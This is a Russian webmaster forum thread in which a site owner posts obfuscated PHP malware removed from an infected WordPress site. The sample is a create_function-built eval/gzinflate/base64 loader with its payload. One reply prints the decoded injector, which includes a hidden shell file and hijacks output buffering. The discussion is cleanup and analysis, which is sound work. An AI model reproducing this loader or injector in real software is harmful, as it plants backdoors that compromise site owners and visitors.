Закодированный код в WP

80
На сайте с 08.07.2013
Offline
0
798

Доброго дня!

Нужен небольшой хелп =)

Недавно попал на заражение сайта какой то дрянью, благо заметил вовремя, и все вычистил.

Но остался интерес, чего же ко мне прилетело. Не мог бы кто нибудь мне помочь раскодировать код, чтобы узнать куда с моего сайта вела данная зараза?

Спасибо заранее.

<?php

$md5 = "e9d1f5ac4581502e0c11890fec2f464e";
$ac = array(')',';','a','d','o','4','$','s',"f",'_',"v",'(',"6",'g',"b",'i','n','z',"e",'t','r',"c","l");
$bc8 = create_function('$'.'v',$ac[18].$ac[10].$ac[2].$ac[22].$ac[11].$ac[13].$ac[17].$ac[15].$ac[16].$ac[8].$ac[22].$ac[2].$ac[19].$ac[18].$ac[11].$ac[14].$ac[2].$ac[7].$ac[18].$ac[12].$ac[5].$ac[9].$ac[3].$ac[18].$ac[21].$ac[4].$ac[3].$ac[18].$ac[11].$ac[6].$ac[10].$ac[0].$ac[0].$ac[0].$ac[1]);
$bc8('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');
?>
<?php

P.S. Если еще и подскажете как проводилась операция по раскодированию, моя благодарность будет безмерной!

LEOnidUKG
На сайте с 25.11.2006
Offline
1774
#1

if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/wpskininfo/domains/skininfo.ru/public_html/test14/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/1af.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

---------- Добавлено 08.07.2013 в 11:38 ----------

Показано, где у вас лежит шелл.

✅ Мой Телеграм канал по SEO, оптимизации сайтов и серверов: https://t.me/leonidukgLIVE ✅ Качественное и рабочее размещение SEO статей СНГ и Бурж: https://getmanylinks.ru/ ✅ Настройка и оптимизация серверов https://getmanyspeed.ru/
80
На сайте с 08.07.2013
Offline
0
#2
LEOnidUKG:
if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/wpskininfo/domains/skininfo.ru/public_html/test14/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/1af.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

---------- Добавлено 08.07.2013 в 11:38 ----------

Показано, где у вас лежит шелл.

Благодарю за оперативную помощь!

Если не сложно, поясните как раскодировать подобный код, если придется столкнуться с подобным в будущем?

SeVlad
На сайте с 03.11.2008
Offline
1609
#3
8262110:
если придется столкнуться с подобным в будущем?

Что бы не сталкиваться (читать дальше названия топика!!!) - не нужно брать на помойках ворованные темы.

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
80
На сайте с 08.07.2013
Offline
0
#4

Спасибо КЭП, только не надо так резко со мной общаться. Тема для вордпресса была мной сделана с нуля, и заражение произошло через плагин, который не был вовремя обновлен. Так что камень не в мой огород.

SeVlad
На сайте с 03.11.2008
Offline
1609
#5
8262110:
только не надо так резко со мной общаться.

Чо-чо, нежный ты наш?! Какая-такая резкость? С адекватностью восприятия интернета проблемы? Нервишки-то береги, а то знаешь ли, в ём действительно можно нарваться на "резкость".

80
На сайте с 08.07.2013
Offline
0
#6
SeVlad:
Чо-чо, нежный ты наш?! Какая-такая резкость? С адекватностью восприятия интернета проблемы? Нервишки-то береги, а то знаешь ли, в ём действительно можно нарваться на "резкость".

Прошу, не надо меня на испуг брать, баш я читал, и эту аксиому знаю. Если не можете помочь в ответе на мой вопрос, идите лесом. Спасибо за понимание.

LEOnidUKG
На сайте с 25.11.2006
Offline
1774
#7
8262110:

Если не сложно, поясните как раскодировать подобный код, если придется столкнуться с подобным в будущем?

Выучиться на программиста. Как ещё вы хотите?!

80
На сайте с 08.07.2013
Offline
0
#8
LEOnidUKG:
Выучиться на программиста. Как ещё вы хотите?!

Немного другого ответа ожидал, но все равно спасибо за помощь оказанную ранее.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий